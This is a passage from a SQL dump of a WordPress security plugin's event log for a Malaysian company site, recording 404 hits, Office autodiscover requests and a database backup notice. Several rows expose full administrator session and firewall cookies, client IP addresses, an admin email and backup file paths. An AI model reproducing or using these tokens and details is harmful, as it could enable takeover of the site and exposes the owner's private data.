charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"756B35C8-7E48-4336-B6C6-17DC565EB264\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZQX4HUhbxD0PppYlQ5cXgAAAUU\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.235\";s:11:\"REMOTE_PORT\";s:5:\"58507\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZQX4HUhbxD0PppYlQ5cXgAAAUU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569986528.2678\";s:12:\"REQUEST_TIME\";s:10:\"1569986528\";}}','notice','2019-10-02 03:22:12','2019-10-02 03:22:09',35902432,37711368,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.235'),(27420,0,'notification_center','send::backup','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:33:\"[bintara.com.my/] Database Backup\";}','debug','2019-10-02 03:29:38','2019-10-02 03:28:46',37318160,124705104,'wp-cron',1,0,'103.6.198.69'),(27421,0,'backup','email-succeeded','a:5:{s:8:\"settings\";a:9:{s:9:\"all_sites\";b:0;s:6:\"method\";i:1;s:8:\"location\";s:84:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups\";s:6:\"retain\";i:0;s:3:\"zip\";b:1;s:7:\"exclude\";a:2:{i:0;s:14:\"itsec_lockouts\";i:1;s:10:\"itsec_temp\";}s:7:\"enabled\";b:1;s:8:\"interval\";i:7;s:8:\"last_run\";i:1569381999;}s:12:\"mail_success\";b:1;s:4:\"file\";s:163:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups/backup-bintara-solutions-sd-20191002-112848-ad0GEEW6Km1KOM2RusVWX01Onk118d.sql\";s:11:\"output_file\";s:163:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups/backup-bintara-solutions-sd-20191002-112848-ad0GEEW6Km1KOM2RusVWX01Onk118d.zip\";s:4:\"size\";i:3851503;}','notice','2019-10-02 03:29:39','2019-10-02 03:28:46',42211904,124705104,'wp-cron',1,0,'103.6.198.69'),(27422,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Maxthon/5.2.3.2000\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"151.237.178.178\";s:11:\"REMOTE_PORT\";s:5:\"56918\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZQbRxgmXC16hB5CLDl1twAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569987399.7201\";s:12:\"REQUEST_TIME\";s:10:\"1569987399\";}}','notice','2019-10-02 03:36:43','2019-10-02 03:36:40',35534856,37341480,'https://bintara.com.my/?page_id=11',1,0,'151.237.178.178'),(27423,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"319\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"20FE44A9-8281-4B85-8A93-4521C97C2B53\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZQ9kDDIbReULXeMMDbLkQAAAFU\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.235\";s:11:\"REMOTE_PORT\";s:5:\"50890\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZQ9kDDIbReULXeMMDbLkQAAAFU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569996177.0535\";s:12:\"REQUEST_TIME\";s:10:\"1569996177\";}}','notice','2019-10-02 06:03:00','2019-10-02 06:02:57',35996728,37805832,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.235'),(27424,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"272-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"7D30908E-84EF-4B78-B936-869FCB199B50\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"272-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZRLPTU8kVzmT4VXgrEqpwAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.235\";s:11:\"REMOTE_PORT\";s:5:\"50534\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZRLPTU8kVzmT4VXgrEqpwAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569999677.2416\";s:12:\"REQUEST_TIME\";s:10:\"1569999677\";}}','notice','2019-10-02 07:01:19','2019-10-02 07:01:17',35521544,37317976,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.235'),(27425,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3100.2 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"147.135.225.193\";s:11:\"REMOTE_PORT\";s:5:\"49519\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZRLrTDIbReULXeMMDbWJQAAAFc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569999789.5397\";s:12:\"REQUEST_TIME\";s:10:\"1569999789\";}}','notice','2019-10-02 07:03:12','2019-10-02 07:03:10',35618952,37429168,'https://bintara.com.my/?page_id=18',1,0,'147.135.225.193'),(27426,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:71:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:56:\"/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"7\";s:13:\"H2_STREAM_TAG\";s:5:\"149-7\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:619:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wordpress_logged_in_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1570094772%7Cwjl2YtUNXvoTDAV1jIJYqtNWiFhp1IZPySUEZDBKCsk%7C87d4469240ddab076dd375ca1e13365f965932d420bd79dc42d66d06a6dc537a; wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7C415dd694ab1a2236ab4937b941f3729b9232a34083a89d42f62d55e7bb5c1447; wordpress_test_cookie=WP+Cookie+check; wp-settings-1=libraryContent%3Dupload%26editor%3Dtinymce%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D1%26editor_plain_text_paste_warning%3D1%26post_dfw%3Doff; wp-settings-time-1=1569996624\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Mobile Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"7\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"149-7\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:2:\"on\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:2:\"on\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"7\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"149-7\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:78:\"https://bintara.com.my/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:56:\"/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZROYMWBowiMh4n@4AbzVAAAAAc\";s:19:\"REDIRECT_SCRIPT_URI\";s:78:\"https://bintara.com.my/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:19:\"REDIRECT_SCRIPT_URL\";s:56:\"/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZROYMWBowiMh4n@4AbzVAAAAAc\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.235\";s:11:\"REMOTE_PORT\";s:5:\"53848\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:78:\"https://bintara.com.my/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:10:\"SCRIPT_URL\";s:56:\"/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZROYMWBowiMh4n@4AbzVAAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570000484.8761\";s:12:\"REQUEST_TIME\";s:10:\"1570000484\";}}','notice','2019-10-02 07:14:47','2019-10-02 07:14:45',36016240,36272752,'https://bintara.com.my/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map',1,1,'115.132.144.235'),(27427,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:71:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:56:\"/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:2:\"11\";s:13:\"H2_STREAM_TAG\";s:6:\"141-11\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:619:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wordpress_logged_in_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1570094772%7Cwjl2YtUNXvoTDAV1jIJYqtNWiFhp1IZPySUEZDBKCsk%7C87d4469240ddab076dd375ca1e13365f965932d420bd79dc42d66d06a6dc537a; wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7C415dd694ab1a2236ab4937b941f3729b9232a34083a89d42f62d55e7bb5c1447; wordpress_test_cookie=WP+Cookie+check; wp-settings-1=libraryContent%3Dupload%26editor%3Dtinymce%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D1%26editor_plain_text_paste_warning%3D1%26post_dfw%3Doff; wp-settings-time-1=1569996624\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:2:\"11\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:6:\"141-11\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:2:\"on\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:2:\"on\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:2:\"11\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:6:\"141-11\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:78:\"https://bintara.com.my/w